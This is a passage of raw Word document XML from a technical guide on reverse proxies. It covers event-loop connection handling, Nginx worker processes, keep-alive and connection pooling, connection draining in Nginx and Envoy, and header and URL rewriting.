        <w:t xml:space="preserve">        read response data. Forward to client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5082012D" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">      if event is "connection closed":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2673FE68" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">        cleanup. Remove from fd_set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF39434" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why this scales:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> One thread manages 10,000+ connections. No thread-per-connection overhead. No context switching between thousands of threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D89601C" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Worker process model (Nginx):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A390E7B" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="674"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Master process: manages worker lifecycle, handles signals, binds to ports.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19ED4559" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="674"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Worker processes (typically: one per CPU core): each handles thousands of connections independently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8A37CE" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="674"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Workers accept connections from a shared listen socket (using SO_REUSEPORT for kernel-level load balancing across workers).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578BB6D2" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="674"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>No inter-worker communication needed (shared-nothing within workers).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F18017" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11.2 HTTP Keep-Alive Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCBB81D" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Client-side keep-alive:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E630E7E" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="675"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Client opens one TCP connection, sends multiple requests sequentially.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692FEF6F" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="675"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Proxy keeps the connection open between requests (configurable idle timeout, e.g., 75 seconds).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F01524F" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="675"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>If no new request arrives within the timeout → proxy closes the connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BF8A80" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="675"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:lastRenderedPageBreak/>
        <w:t>keepalive_requests (Nginx): maximum requests per connection before forcing reconnection (default: 1000). Prevents memory leaks from long-lived connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F311641" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Backend-side keep-alive (connection pooling):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492FBFF0" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="676"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Proxy maintains persistent connections to backends.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E32BA2" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="676"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>After receiving a response, the connection is returned to the pool (not closed).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710DD0B2" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="676"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Next request to the same backend reuses the pooled connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0C3D9E" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="676"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Pool limits: keepalive directive in Nginx (e.g., 64 idle connections per upstream).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A4A11B" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The mismatch problem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C53FF6" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="677"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Client sends requests slowly (one every 5 seconds).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3367DC" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="677"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Proxy holds one client-side connection AND one backend-side connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112422D5" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="677"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Backend's keep-alive timeout is 10 seconds. After 10 seconds of idle, backend closes the connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325909C1" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="677"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Proxy's next request to the backend hits a closed connection (TCP RST) → error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD7EE12" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solution:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Proxy's backend keepalive timeout must be SHORTER than the backend's timeout. Proxy closes idle backend connections BEFORE the backend does, avoiding race conditions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D4E62B" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11.3 Connection Draining at the Proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8ED59A" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Scenario: removing a backend for deployment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA54C32" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="678"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Mark backend as "draining" in the proxy configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56691B31" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="678"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Proxy stops sending NEW requests to that backend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1944F88D" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="678"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Proxy waits for in-flight requests to complete (existing connections are active).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FFF339" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="678"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>After all in-flight requests complete (or a timeout): backend is fully removed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47227573" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Nginx implementation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100088E8" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="679"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>server backend1:8080 down; — immediately removes (no draining, connections cut).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F90F4BC" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="679"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Graceful reload (nginx -s reload): new worker processes start accepting. Old workers finish existing requests, then exit. Zero-downtime configuration changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7709C2EF" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Envoy's approach (more sophisticated):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8847BB" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="680"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:lastRenderedPageBreak/>
        <w:t>Health check marks host unhealthy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2334A2FB" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="680"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Envoy enters "draining" mode for that host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355D4D0D" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="680"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Active connections are allowed to complete.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5761CBB4" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="680"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>A "drain timeout" limits how long to wait.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD0AC61" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="680"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>New connections are NEVER sent to draining hosts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2971E5F9" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="680"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>After drain completes: host is removed from cluster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1190480B" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:pict w14:anchorId="4638006D">
          <v:rect id="_x0000_i3327" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="67288584" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>12. Proxy-Level Request Manipulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189709A6" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>12.1 Header Manipulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7559DFF8" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Adding headers (inject metadata for backends):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F235EA" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0B1F8F" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t># Nginx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC68AB7" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>proxy_set_header X-Request-ID $request_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC45930" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>proxy_set_header X-Real-IP $remote_addr;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499E3D96" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>proxy_set_header X-Forwarded-Proto $scheme;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AD7157" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>The proxy generates unique request IDs for distributed tracing — every service in the chain can correlate logs using this ID.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E20C3E" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Removing headers (strip sensitive info before sending to backends or clients):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FC871B" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD7F5D1" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t># Remove server version info from responses (security)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FE390D" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>proxy_hide_header X-Powered-By;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DF97AB" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>proxy_hide_header Server;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CA3CD6" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Overriding headers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8C9CAE" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>The proxy can replace the Host header when routing to backends:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7663AF3A" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="681"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Client sends: Host: api.example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6946331D" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="681"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Proxy forwards to backend with: Host: internal-service.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4523C0DE" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="681"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:lastRenderedPageBreak/>
        <w:t>Enables virtual hosting and multi-tenant routing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AADC9E" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>12.2 URL Rewriting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DE5651" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Path stripping:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA22EC1" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="682"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Client requests: /api/v2/users/123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E866F8" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="682"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Proxy routes to user-service and rewrites to: /users/123 (strips the /api/v2 prefix)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C33586" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="682"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>The user-service doesn't know about the public URL structure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E93211" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Path manipulation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E328E97" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="683"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Client requests: /old-path/resource</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24951D96" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="683"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Proxy rewrites to: /new-path/resource (migration without client changes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079CB82C" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="683"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Returns 301 Redirect to clients for permanent moves.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225217B3" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>12.3 Request/Response Body Manipulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4263EBD8" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Compression:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5B91B1" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="684"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Client sends: Accept-Encoding: gzip, br (supports gzip and Brotli).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F0ED11" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="684"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Proxy receives uncompressed response from backend (backends often don't compress — it's CPU overhead on every response).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC3A71A" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="684"/>
